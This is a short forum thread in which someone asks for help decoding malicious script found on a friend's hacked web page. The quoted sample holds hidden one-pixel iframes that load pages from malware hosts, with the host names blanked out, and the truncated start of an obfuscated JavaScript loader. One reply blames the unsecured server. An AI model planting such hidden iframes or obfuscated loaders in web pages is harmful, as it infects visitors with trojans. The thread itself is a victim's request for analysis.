site hacked - can anyone de-code this?

Do you have a question? Post it now! No Registration Necessary.  Now with pictures!

Threaded View
a friend of mine had his web server hacked and his webpage contained the
following script that seemed to trigger off a "downloader trojan" warning
when I inadvertantly opened the page in my browser.

i'm not up on scripting, so would appreciate anyone could tell me how this
thing works, or if it left any trace of 'whodunnit'...?  :)

thanks for any help

(WARNING: those links may still be live trojans,
don't visit those sites unless you're protected)

==============BEGIN CODE ===========

<iframe src="http://removethisline/dl/adv407.php" width=1 height=1></iframe>
<iframe src='http://removethisline/strong/167/' width=1 height=1></iframe>
<iframe src='http://removethisline/adv/new.php?adv=167' width=1
<script language="JavaScript">e = '0x00' + '5F';str1 =
tr=tmp='';for(i=0;i<str1.length;i+=3){tmp =

=================END OF CODE===============

Re: site hacked - can anyone de-code this?

Quoted text here. Click to load it

Why bother? All that's going to happen is the site is going to get hacked
again, because the Web server, file system, user accounts, the registry and
the O/S are not secured.

Site Timeline